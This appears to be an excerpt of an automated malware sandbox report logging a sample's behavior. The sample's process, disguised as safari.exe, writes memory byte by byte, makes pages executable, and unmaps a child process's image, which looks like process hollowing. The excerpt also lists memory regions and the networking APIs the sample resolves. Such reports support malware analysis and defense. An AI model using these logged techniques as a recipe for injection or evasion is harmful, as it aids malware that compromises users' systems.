| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70001e, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70001f, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700020, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700021, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700022, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700023, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700024, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700025, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700026, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700027, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700028, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700029, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70002a, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70002b, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70002c, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70002d, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70002e, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70002f, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700030, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700031, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700032, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700033, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700034, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700035, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700036, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700037, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700038, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700039, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70003a, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70003b, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70003c, size = 1 |
|
1 | |
| Memory | Protect | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x7782d9b0, protection = PAGE_EXECUTE_READWRITE, size = 1024 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x7782d9b0, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x7782d9b1, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x7782d9b2, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x7782d9b3, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x7782d9b4, size = 1 |
|
1 | |
| Memory | Protect | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x7782d9b0, protection = PAGE_EXECUTE_READ, size = 1024 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtUnmapViewOfSection, address_out = 0x779d6f40 |
|
1 | |
| Module | Unmap | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlNtStatusToDosError, address_out = 0x779b83c0 |
|
1 |
Process #7: smsvchost32.exe
1009
296
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
| Command Line | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe --vwxyz |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:01:10, Reason: Child Process |
| Unmonitor | End Time: 00:01:27, Reason: Self Terminated |
| Monitor Duration | 00:00:17 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdb8 |
| Parent PID | 0xdb0 (c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
E74
0x
D5C
0x
560
0x
4D4
0x
E2C
0x
C48
0x
55C
0x
E8C
0x
9A4
0x
E50
0x
EC8
0x
E44
0x
D60
0x
E60
0x
F70
0x
3F8
0x
A4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00054fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| smsvchost32.exe | 0x00400000 | 0x0043cfff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000440000 | 0x00440000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004b2fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x005c0000 | 0x0067dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x007bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007c0000 | 0x007c0000 | 0x007fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x00800fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x0081ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x009a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009b0000 | 0x009b0000 | 0x00b30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b40000 | 0x00b40000 | 0x01f3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| oleaut32.dll | 0x01f40000 | 0x01fd0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001f40000 | 0x01f40000 | 0x0203ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02040000 | 0x02376fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002380000 | 0x02380000 | 0x0247ffff | Private Memory | rw |
|
|
|
- |
| counters.dat | 0x02480000 | 0x02480fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002490000 | 0x02490000 | 0x02493fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024a0000 | 0x024a0000 | 0x024dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024e0000 | 0x024e0000 | 0x025dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025e0000 | 0x025e0000 | 0x0261ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002620000 | 0x02620000 | 0x0271ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002720000 | 0x02720000 | 0x0275ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002760000 | 0x02760000 | 0x0285ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002860000 | 0x02860000 | 0x02860fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002870000 | 0x02870000 | 0x028affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028b0000 | 0x028b0000 | 0x029affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029b0000 | 0x029b0000 | 0x029effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029f0000 | 0x029f0000 | 0x02aeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002af0000 | 0x02af0000 | 0x02af0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002b00000 | 0x02b00000 | 0x02b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b40000 | 0x02b40000 | 0x02c3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002c40000 | 0x02c40000 | 0x02c41fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002c50000 | 0x02c50000 | 0x02c50fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002c60000 | 0x02c60000 | 0x0305afff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000003060000 | 0x03060000 | 0x03060fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003060000 | 0x03060000 | 0x0309ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030a0000 | 0x030a0000 | 0x0319ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000031a0000 | 0x031a0000 | 0x0329ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032a0000 | 0x032a0000 | 0x032dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032a0000 | 0x032a0000 | 0x033a1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032e0000 | 0x032e0000 | 0x033dffff | Private Memory | rw |
|
|
|
- |
| winnlsres.dll | 0x033e0000 | 0x033e4fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll.mui | 0x033f0000 | 0x033fffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003400000 | 0x03400000 | 0x0343ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003440000 | 0x03440000 | 0x0353ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003540000 | 0x03540000 | 0x0373ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003740000 | 0x03740000 | 0x03b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b10000 | 0x03b10000 | 0x0409efff | Private Memory | rw |
|
|
|
- |
| private_0x00000000040a0000 | 0x040a0000 | 0x0449ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044a0000 | 0x044a0000 | 0x04618fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044a0000 | 0x044a0000 | 0x04799fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044a0000 | 0x044a0000 | 0x04a35fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004620000 | 0x04620000 | 0x0481bfff | Private Memory | rw |
|
|
|
- |
| private_0x00000000047a0000 | 0x047a0000 | 0x04b12fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004820000 | 0x04820000 | 0x04a98fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a40000 | 0x04a40000 | 0x04fd4fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000004b20000 | 0x04b20000 | 0x04ee1fff | Private Memory | rw |
|
|
|
- |
| wow64win.dll | 0x55c00000 | 0x55c79fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x55c80000 | 0x55c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x55c90000 | 0x55cdffff | Memory Mapped File | rwx |
|
|
|
- |
| cabinet.dll | 0x6fe50000 | 0x6fe70fff | Memory Mapped File | rwx |
|
|
|
- |
| webio.dll | 0x6fe80000 | 0x6fee7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptnet.dll | 0x6fef0000 | 0x6ff14fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x6ff20000 | 0x6ff3efff | Memory Mapped File | rwx |
|
|
|
- |
| samlib.dll | 0x6ff40000 | 0x6ff52fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x6ff60000 | 0x6ff69fff | Memory Mapped File | rwx |
|
|
|
- |
| samcli.dll | 0x6ff70000 | 0x6ff84fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x6ff90000 | 0x6ff99fff | Memory Mapped File | rwx |
|
|
|
- |
| eappcfg.dll | 0x6ffa0000 | 0x6ffe9fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x6fff0000 | 0x6fff7fff | Memory Mapped File | rwx |
|
|
|
- |
| cmutil.dll | 0x70000000 | 0x7000efff | Memory Mapped File | rwx |
|
|
|
- |
| cmpbk32.dll | 0x70010000 | 0x70019fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x70040000 | 0x7006efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x70070000 | 0x70082fff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x70090000 | 0x70097fff | Memory Mapped File | rwx |
|
|
|
- |
| ncryptsslp.dll | 0x700a0000 | 0x700b9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntasn1.dll | 0x700c0000 | 0x700ebfff | Memory Mapped File | rwx |
|
|
|
- |
| ncrypt.dll | 0x700f0000 | 0x7010ffff | Memory Mapped File | rwx |
|
|
|
- |
| mskeyprotect.dll | 0x70110000 | 0x7011ffff | Memory Mapped File | rwx |
|
|
|
- |
| schannel.dll | 0x70120000 | 0x70183fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x701e0000 | 0x701f8fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x70200000 | 0x70207fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x70210000 | 0x702aafff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x702b0000 | 0x704bcfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x704c0000 | 0x7063dfff | Memory Mapped File | rwx |
|
|
|
- |
| ondemandconnroutehelper.dll | 0x70b90000 | 0x70ba1fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x70e20000 | 0x70e33fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x70e40000 | 0x70e52fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x71cd0000 | 0x71d16fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x71d20000 | 0x71d27fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x71d30000 | 0x71d5efff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x71d60000 | 0x71de3fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x71ea0000 | 0x71eeefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x721f0000 | 0x724bafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74330000 | 0x7434afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74680000 | 0x74689fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74690000 | 0x746adfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x746c0000 | 0x7471efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x74720000 | 0x74763fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74770000 | 0x747b3fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x747c0000 | 0x7487dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74880000 | 0x74a3cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74aa0000 | 0x74b1afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74b20000 | 0x74b64fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x74b70000 | 0x75068fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75070000 | 0x7511cfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75120000 | 0x7651efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x765a0000 | 0x7667ffff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x766e0000 | 0x766eefff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76b60000 | 0x76bf1fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x76c00000 | 0x76c41fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x76ec0000 | 0x76ef6fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76f00000 | 0x7704efff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x77050000 | 0x771c7fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x771d0000 | 0x772bafff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x772c0000 | 0x772c5fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x772d0000 | 0x772ddfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x772e0000 | 0x7730afff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77310000 | 0x77393fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x773a0000 | 0x773f7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77400000 | 0x7748cfff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x77490000 | 0x774a2fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x774b0000 | 0x774b6fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x774c0000 | 0x7763dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77760000 | 0x7776bfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77810000 | 0x77956fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77960000 | 0x77adafff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc1562ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc157f1000 | 0x7ffc157f1000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 44 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Threads
Thread 0xe74
246
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Load | module_name = k, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = eappcfg.dll, base_address = 0x6ffa0000 |
|
1 | |
| Module | Load | module_name = Kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77992bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x765b1ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x765c5eb0 |
|
1 | |
| Module | Get Handle | module_name = WININET.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x702b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x70351880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x70357d00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x70351dc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersA, address_out = 0x7032c3f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x7037d200 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x70378e60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x703f0da0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x70337320 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x7032bec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x70378490 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x70330fd0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\shlwapi.dll, base_address = 0x74b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x74b37a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCatW, address_out = 0x74b484a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCpyW, address_out = 0x74b484e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpIW, address_out = 0x74b34750 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCpyNW, address_out = 0x74b433f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrA, address_out = 0x74b43570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrDupW, address_out = 0x74b39060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x74b381b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrRChrW, address_out = 0x74b3d1c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpW, address_out = 0x74b35fe0 |
|
1 | |
| Module | Get Handle | module_name = PSAPI.DLL, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetProcessImageFileNameA, address_out = 0x772c16a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = _chkstk, address_out = 0x779da570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlAllocateHeap, address_out = 0x77992bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlFreeHeap, address_out = 0x77990230 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = memset, address_out = 0x779dcfe0 |
|
1 | |
| Module | Get Handle | module_name = USERENV.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = USERENV.dll, base_address = 0x701e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\userenv.dll, function = CreateEnvironmentBlock, address_out = 0x701e4480 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\userenv.dll, function = GetProfilesDirectoryW, address_out = 0x701e45a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\userenv.dll, function = DestroyEnvironmentBlock, address_out = 0x701e4510 |
|
1 | |
| Module | Get Handle | module_name = WS2_32.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = WS2_32.dll, base_address = 0x746c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x746f1110 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 2, address_out = 0x746d3230 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 3, address_out = 0x746cead0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x746c5240 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 23, address_out = 0x746ce6b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 15, address_out = 0x746c4a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 115, address_out = 0x746c6520 |
|
1 | |
| Module | Get Handle | module_name = WINHTTP.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = WINHTTP.dll, base_address = 0x70210000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpQueryDataAvailable, address_out = 0x702347a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpReceiveResponse, address_out = 0x7021c8e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpOpen, address_out = 0x70246720 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpAddRequestHeaders, address_out = 0x70229400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpQueryHeaders, address_out = 0x702309c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpReadData, address_out = 0x70234ea0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpOpenRequest, address_out = 0x70248dd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpSetOption, address_out = 0x702306f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpCloseHandle, address_out = 0x70233ad0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpSendRequest, address_out = 0x7023bfd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winhttp.dll, function = WinHttpConnect, address_out = 0x70242880 |
|
1 | |
| Module | Get Handle | module_name = NETAPI32.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = NETAPI32.dll, base_address = 0x77490000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\netapi32.dll, function = NetApiBufferFree, address_out = 0x6ff916d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\netapi32.dll, function = NetUserGetInfo, address_out = 0x6ff733a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x765e2790 |
|
1 | |
